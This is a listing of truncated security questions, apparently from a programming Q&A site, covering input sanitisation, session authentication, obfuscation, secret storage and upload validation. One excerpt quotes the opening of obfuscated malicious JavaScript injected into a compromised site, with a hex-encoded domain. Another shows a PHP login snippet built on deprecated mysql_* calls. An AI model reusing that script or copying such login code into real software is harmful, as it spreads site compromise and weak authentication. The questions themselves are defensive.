I have an app that reprocesses HTML in order to do nice typography. Now, I want to put it up on the web to let users type in their text. So here's the question: I'm pretty sure that I want to remove the SCRIPT tag, plus closing tags like </form>. But what else should I remove to make it totally safe? ...
If there is truly a 'best' way, what is the best way to ship a python app and ensure people can't (easily) reverse engineer your algorithms/security/work in general? If there isn't a 'best' way, what are the different options available? Background: I love coding in Python and would love to release more apps with it. One thing that I w...
Let's say I have an existing application written in Java which I wish to add scripting support to. This is fairly trivial with Groovy (and just as trivial in .Net with any of the Iron range of dynamic languages). As trivial as adding the support is, it raises a whole host of questions about script execution and security - and how to imp...
Hi all, On my C# asp.net webform I have a search page that has roughly 20 elements that "could" be used as part of the search. There will be more added later. What I have done is extend the textbox and dropdown listbox to include a few variables: fieldname: Tablename.columnname dbtype: DbType.Int32 Joinparam: LEFT Join on otherTable ...
I've developed my website that checks if the user is registered and creates a session variable with the username. It's all that is stored as a session variable. If I want to protect my pages (so that only registered users may see them), I check if the session variable is set. Is this secure? Or can you give a more secure method? ...
<?php session_start(); include("connect.php"); $timeout = 60 * 30; $fingerprint = md5($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']); if(isset($_POST['userName'])) { $user = mysql_real_escape_string($_POST['userName']); $password = mysql_real_escape_string($_POST['password']); $matchingUser = mysql_query("SELECT * ...
I have a tool that is distributed freely as an Eclipse plugin, which means that I can't track who uses it or ask them to register. Every client tool communicate via a JMS broker with a single shared server process (written in Java) and can receive messages in reply. The server connects via Hibernate to a MySQL database. At present, the...
First, a little background: It is no secret that I am implementing an auth+auth system for CodeIgniter, and so far I'm winning (so to speak). But I've run into a pretty non-trivial challenge (one that most auth libraries miss entirely, but I insist on handling it properly): how to deal intelligently with large-scale, distributed, variabl...
We're looking for a way to secure third party code within our web pages. Someone suggested we use Caja. I looked into that, but the information about it is quite sparse. Before I deep dive into it, I would first like to know: Can Caja handle embedded HTML like Google Map's, which effectively acts as a bootstrap, and loads all the activ...
Suppose you want to add an extra layer of credentials on top of a SSL-encrypted login/password, but you don't want to increase complexity to the user. Is there a way to add the requirement of the possession of a dongle to web-server authentication schemes with existing cross-platform browser capabilities? In other words, to get access t...
Hey everyone, I am working on a script that will process user uploads to the server, and as an added layer of security I'd like to know: Is there a way to detect a file's true extension/file type, and ensure that it is not another file type masked with a different extension? Is there a byte stamp or some unique identifier for each typ...
Is there some sort of "built-in" authentication in WCF? I need to expose a web service to our clients so they can check status of their transactions. My initial thought was they would just use their normal Username and Password passed in as method properties. It would be over SSL, of course, but is this method of authentication not ...
With JavaScript, it is quite easy to have an <input> element automatically take on a value once the page has loaded, so long as its type attribute is not "file"; this makes perfect sense, of course, given that auto-submitting a form containing sensitive data to a server is a single line of code away. However, on a home server (WAMP, if ...
Suppose the app you are working on is specially designed for a customer to meet a particular 'in-house' need, such as data processing of payroll information. This application will not be distributed publicly and will reside on internal networks only. (Theoretically the internal network should remain 100% secure.) How much effort sho...
Hi! I recently finished a university course in C. Therefore I lack experience, of course. Some universities tend to teach their students secure programming, or at least some elements. There's even a video (taken from here). Being in C, copying strings, requires - as far as I know - strcpy or string.h functions. How do you use it secu...
I'm adding some encryption methods to a class library (C# 2.0) and would like to know the best place to put the pass phrase, salt value and initialisation vector required. Is it a really bad idea just to hard-code these into the DLL, or should I be be encoding them and storing them somewhere else? Thanks. Edit: Further info - encryptio...
I have an application where I need to use 'Basic Authentication'; however, in order for you to debug the application in Visual Studio, IIS requires the directory to also have 'Windows Authentication' enabled. The problem is my user handler tries to send out a request for basic authentication to compare them to a database... but the basi...
Well, I guess this day had to come. My client's website has been compromised and blacklisted by Google. When you load the main page this javascript gets automatically added to the bottom of the document: <script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';st...
I'm working on a WCF service that will be communicating over net.tcp to n instances of a client app (that is being developed by another programmer in my office). At the moment I am using net.tcp without any security as I felt setting this up at this stage wasn't necessary, at least not until we are closer to rolling out. During the de...
Hi, i'm using the entity framework in a asp.net 3.5 web application. What is best practice to store the database connection string in a secure (encrypted) way? (i'm using username/password to get to the database) (i have to delete the model very often, as the database designer in vs2008 does not update the foreign keys very good). ...